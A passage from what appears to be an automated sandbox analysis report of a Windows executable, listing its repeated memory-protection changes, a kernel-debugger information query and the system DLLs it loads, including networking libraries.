808	C:\binary.exe	416220	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416650	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416280	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416284	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416288	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41628C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416290	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416294	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416298	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41629C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162A4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162A8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162AC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162B0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162B8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162BC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4162C0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416664	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	4162C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416678	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416254	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416258	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41625C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416260	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416264	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416268	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41626C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416270	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416274	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416278	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41668C	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	41620C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416210	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4166A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	4162D0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4166B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416110	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416114	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416118	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41611C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416120	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416124	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416128	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41612C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416130	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4166C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416140	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416144	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416148	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41614C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416150	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416154	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416158	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41615C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416160	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416164	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416168	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41616C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416170	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416174	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416178	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41617C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416180	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416184	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416188	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41618C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416190	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416194	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416198	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41619C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161A4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161A8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161AC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161B0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161B8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161BC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161C0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161C4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161CC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161D0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161D4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161D8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161DC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161E0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161E4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161E8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161EC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161F0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161F4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161F8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4161FC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416200	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416204	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4166DC	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416008	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41600C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416010	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416014	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416018	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41601C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416020	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416024	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416028	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41602C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416030	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416034	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416038	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41603C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416040	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416044	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416048	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41604C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416050	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416054	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416058	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41605C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416060	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416064	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416068	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41606C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416070	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416074	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416078	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41607C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416080	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416084	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416088	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41608C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416090	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416094	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416098	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41609C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160A4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160A8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160AC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160B0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160B8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160BC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160C0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160C4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160CC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160D0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160D4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160D8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160DC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160E0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160E4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160E8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160EC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160F0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160F4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160F8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	4160FC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416100	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416104	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416108	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	400000	1000	page execute and read and write	page readonly	success or wait	1	482B8D
808	C:\binary.exe	400000	1000	page readonly	NULL	access violation	1	482BF7

System Activities:

System information queried
System info class	Completion	Count	Source Address
KernelDebuggerInformation	success or wait	1	40758F

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1584010358
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1584035135
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1584039043
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1584041785
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1584043375
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1584065744
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1584069084
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1584084669
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1584092412
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1584104015
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1584122715
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1584132720
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1584143728
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1584155338
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1584188794
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1584204592
Section loaded	Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid	success or wait	1584223497
Section loaded	Path: \KnownDlls\WININET.dll Access: write and read and execute Type: image Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid	success or wait	1584244035
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: image Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid	image not at base	1584257311
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: image Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid	conflicting addresses	1584260370
Section loaded	Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: image Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid	success or wait	1584272599
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1584280195
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1584300872
Section loaded	Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: image Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid	success or wait	1584330012
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1584359485
Section loaded	Path: C:\WINDOWS\system32\mfc42.dll Access: query and write and read and execute Type: image Baseaddress: 73DD0000 Size: 987136 Protection: read write Mapped to pid: own pid	success or wait	1584386049
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1584441963
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1584447830
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1584454161
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1584519229
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1584540234
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1584692860
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1584699416
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1584726462
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1584738046
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1584742666
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1584823722
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1584852672
Memory allocated	PID: 808 Path: C:\binary.exe Base: 3F0000 Length: 12FCF4 Allocation Type: null Protection: page read and write	success or wait	1585354187
Memory allocated	PID: 808 Path: C:\binary.exe Base: 3F0000 Length: 12FCF4 Allocation Type: null Protection: page read and write	success or wait	1585418482
Memory allocated	PID: 808 Path: C:\binary.exe Base: 3F0000 Length: 12FCF4 Allocation Type: null Protection: page read and write	success or wait	1585429323
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416600 Length: 1000 New Protection: page execute and read and write New Protection: page read and write	success or wait	1585448004
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585448650
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416614 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585449214
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416228 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585449933
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41622C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585450500
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416230 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585451064
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416234 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585451627
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416238 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585452189
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41623C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585452751
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416240 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585453315
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416244 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585453988
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416248 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585454558
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41624C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585455119
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416628 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585455926
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416138 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585456556
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41663C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585457117
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585457759
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41621C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585458330
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416220 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585458783
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416650 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585822881
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416280 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585823191
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416284 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585836359
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416288 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585836583
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41628C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585836788
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416290 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585845400
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416294 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585845623
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416298 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585845829
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41629C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585848925
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585849147
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162A4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585849352
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162A8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585857100
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162AC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585857324
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162B0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585857533
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585859508
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162B8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585859847
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162BC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585860056
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162C0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585868774
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416664 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585869025
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585869314
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416678 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585873555
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416254 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585873821
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416258 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585874035
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41625C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585877752
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416260 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585878310
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416264 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585878544
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416268 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585879911
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41626C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585880135
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416270 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585880342
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416274 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585887832
